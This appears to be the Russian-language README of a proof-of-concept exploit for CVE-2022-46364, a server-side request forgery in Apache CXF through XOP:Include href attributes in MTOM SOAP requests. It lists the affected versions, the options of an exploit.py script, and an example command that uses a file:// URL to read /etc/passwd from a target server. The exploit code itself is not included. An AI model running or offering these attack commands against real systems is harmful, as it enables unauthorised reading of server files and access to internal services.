
CVE-2022-46364-Poc Apache CXF SSRF через MTOM XOP:Include
Apache CXF SSRF через MTOM XOP:Include | CVSS 9.8 КРИТИЧЕСКИЙ
Apache CXF < 3.5.5 / < 3.4.10 позволяет выполнить Server-Side Request Forgery через непроверенные атрибуты href в элементах XOP:Include в MTOM-кодированных SOAP-запросах.
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - Уязвимый SOAP-эндпоинт CXF (обязательно)-s, --ssrf-url - Внутренний URL для эксфильтрации (обязательно)-d, --domain - Целевой домен (по умолчанию: localhost)--plain-soap - Использовать обычный SOAP вместо MTOM# Read /etc/passwd
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com